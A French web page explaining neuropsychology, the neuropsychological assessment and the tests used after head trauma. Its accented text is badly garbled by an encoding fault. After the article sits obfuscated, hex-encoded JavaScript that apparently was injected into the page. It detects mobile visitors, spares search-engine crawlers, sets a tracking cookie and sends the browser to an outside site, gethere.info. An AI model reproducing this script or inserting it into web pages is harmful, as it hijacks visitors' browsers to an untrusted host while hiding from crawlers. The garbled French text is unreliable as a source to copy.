A�

Qua��est-ce que la neuropsychologie ?

La neuropsychologie est la discipline qui A�tudie les liens entre le fonctionnement du cerveau et le comportement. Elle sa��intA�resse A� la��A�tude des modifications cognitives : perte et compensation (langage, mA�moire, attention, fonctions exA�cutives, espace, praxies etc.), A�motionnelles, comportementales aprA?s une lA�sion cA�rA�brale ou dans le cadre da��une maladie. La neuropsychologie a deux missions : le diagnostic (identification du dA�ficit, analyse et retentissement au quotidien) et la prise en soin (rA�A�ducation, dA�veloppement de compensation, information du sujet et de sa famille, rA�insertion sociale, professionnelle ou scolaire etc.). Par ailleurs, on a recours A� la��usage de protocole neuropsychologique pour valider la��effet de thA�rapeutiques A� visA�e cognitive ou comportementale ou les effets dA�lA�tA?res de certaines molA�cules. De plus, la neuropsychologie permet encore aujourda��hui da��enrichir les connaissances sur la cognition et le comportement.

La pratique repose sur un examen clinique soigneux : la��entretien et le recueil du rA�cit du sujet en est la premiA?re A�tape. Des outils normalisA�s (tests, A�chelles, questionnaires) pour mesurer les performances sont disponibles. Sa pratique nA�cessite de connaA�tre la neurologie, la��anatomie, les modA?les cognitifs classiques et en dA�veloppement, et les outils afin de savoir les choisir -aucun bilan ne repose sur une seule A�preuve- en fonction des caractA�ristiques du sujet et du symptA?me, les rA�aliser, accompagner psychologiquement cette rA�alisation (souvent douloureuse pour le sujet A� A�valuA� A�) et interprA�ter les rA�sultats.

La spA�cialitA� loin da��A?tre dA�suA?te sa��inscrit au carrefour des neurosciences et des sciences cognitives (cognition et comportement du sujet normal). Il sa��agit da��une spA�cialitA� transdisciplinaire ce qui brouille parfois sa lisibilitA� dans le champ de la neurologie. Les mA�decins impliquA�s sont majoritairement des neurologues mais aussi des psychiatres, neuropA�diatres, neurochirurgiens, gA�riatres ou rA�A�ducateurs dans leur champ de spA�cialitA�. Les psychologues sont A�videmment les acteurs privilA�giA�s aux cA?tA�s desquels il ne faut pas oublier les orthophonistes spA�cialisA�es dans le langage. La��examen neuropsychologique fait partie de la��examen neurologique gA�nA�ral : tout neurologue doit pouvoir faire un bilan rapide neuropsychologique et une synthA?se des bilans spA�cialisA�s neuropsychologique et orthophonique.

Le bilan neuropsychologique

Le bilan neuropsychologique est toujours rA�alisA� aprA?s un entretien ce afin de connaA�tre le sujet, de repA�rer son symptA?me (et la��objet du bilan) et de choisir les outils nA�cessaires et appropriA�s A� la��expertise. Le bilan permet de dA�terminer le retentissement cognitivo-comportemental da��une pathologie connue, de contribuer au diagnostic, de documenter une plainte, da��A�tablir un projet de soin individualisA�, da��A�tablir une ligne de base, de contribuer A� une expertise mA�dico-lA�gale ou A� un projet de recherche.

Certaines circonstances sont dA�favorables A� sa rA�alisation : la��imprA�cision de la demande, la��opposition du patient, le moment mal choisi (en cours de traitement lourd, A� la phase aigue da��une symptomatologie), les dA�ficits sensoriels et moteurs, la barriA?re culturelle et/ou linguistique.

Le bilan est composA� de tests, A�chelles et questionnaires normalisA�s dont on a vA�rifiA� la fidA�litA� (un test rA�alisA� A� deux reprises donne des rA�sultats similaires), la validitA� (le test mesure ce qua��il est censA� mesurer), la sensibilitA� et la spA�cificitA�. Le test est uns situation expA�rimentale qui permet de mesurer un comportement. Il est forcA�ment long puisque tout dA�ficit doit A?tre A�valuA� avec plusieurs outils pour A�viter un faux positif du A� un outil et analyser tous les aspects du dA�ficit. Par exemple un trouble de la mA�moire doit comprendre au moins la��expertise du rappel et de la reconnaissance (processus), en mA�moire immA�diate et diffA�rA�e (temporalitA�), pour les modalitA�s verbales et visuelles etc. Il convient toujours de vA�rifier la prA�servation de autres fonctions (avant un bilan de la mA�moire verbale, une mesure de la A� fonction instrumentale A� langage est obligA�e). Il existe des tests globaux (niveau cognitif gA�nA�ral), des tests unidimensionnels (mA�moire etc.), des batteries composites, des A�chelles fonctionnelles etc. Les tests peuvent A?tre papier-crayon ou informatisA�. La��outil informatique sa��il permet de trA?s bien contrA?ler les conditions expA�rimentales, ne supprime pas le psychologue : la machine mesure, le psychologue teste, accompagne et ne produit jamais seulement un rA�sultat chiffrA� puisqua��il rA�dige toujours une interprA�tation et une synthA?se. Les tests de repA�rage rA�alisA� en premiA?re ligne par le neurologue rA�pondent aux mA?mes critA?res. Le neurologue doit en outre avoir une culture gA�nA�rale neuropsychologique suffisante pour expliquer et transmettre les donnA�es du bilan au patient, A� sa famille et A� ses correspondants.

A�Bilan neuropsychologique pour les traumatisA�s crA?niens, bilan-sA�quelles

Le bilan comporte une A�valuation qualitative et quantitative.
Il comporte toute une batterie de tests et des tests complA�mentaires pour mieux explorer certaines fonctions.
Ils sont utilisA�s en fonction de ce qu’on recherche (ils peuvent analyser davantage tel ou tel A�lA�ment, par exemple correspondant A� une lA�sion visible A� l’IRM).
Ils sont aussi utilisA�s en fonction de l’A?ge, du niveau intellectuel, culturel.

Les tests sont trA?s nombreux et leurs noms et rA�sultats peuvent figurer en annexe de l’expertise quand le bilan neuropsychologique est joint.
On peut citer:
-La WAIS R qui mesure l’intelligence (verbal et performance, peuvent A?tre altA�rA�s) Ce test peut (comme les autres) permettre de suivre l’A�volution.
-Le BINOIS PICHOT mesure l’intelligence verbale.
-Le D48 mesure l’intelligence gA�nA�rale et le « rendement intellectuel ».
-Le PM38 A�value le raisonnement logique.
-Le WISCONSIN A�value la catA�gorisation, les stratA�gies d’action, la mA�morisation.
-Le Test de STROOP A�valuation du contrA?le de l’interfA�rence altA�rA�e dans le syndrome frontal.
-Le TRAIL MAKING TEST : exploration visuelle, coordination motrice &, flexibilitA� mentale chez le traumatisA� crA?nien (syndrome frontal).
-Le Test de BARRAGE de ZAZZO: vitesse et discrimination visuelle (recherche de l’attention, fatigabilitA�).
– La TOUR DE LONDRES: planification (limitA�e dans le syndrome frontal).
Des tests de mA�moire :
-La figure de REY : organisation perceptivo-motrice (en copie) et apprentissage (en visuo spatial)
-Les Mots de REY; capacitA� d’apprentissage.
-Echelle clinique de mA�moire de WESCHLER.
-Le VRT BENTON: capacitA� d’A�vocation en modalitA� visuo-spatial.
Des tests de personnalitA� :
– Test de RORSCHACH : fonctionnement et personnalitA� du patient qui est « pauvre » chez le traumatisA� crA?nien.
-Test du TAT : perception par rapport au handicap.
L’entretien permet de tester la mA�moire (biographie), le comportement A� travers un entretien dirigA� : Echelle de LEVIN.
L’utilisation et interprA�tation des tests nA�cessitent un neuropsychologue expA�rimentA� connaissant bien la pathologie.
Pour mieux apprA�cier les troubles neuropsychologiques, il est intA�ressant de complA�ter le bilan et faire pratiquer A�ventuellement un bilan d’orthophonie pour le langage, l’A�criture, la lecture, le calcul, de rechercher davantage les gnosies, les praxies. L’apport des ergothA�rapeutes est trA?s intA�ressant.
Ainsi il est mieux que le mA�decin fasse aussi des A�valuations mA?me succinctes mais il est important que les tests choisis ne se parasitent pas entre les diffA�rents A�valuateurs d’oA? la nA�cessitA� d’une coordination.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}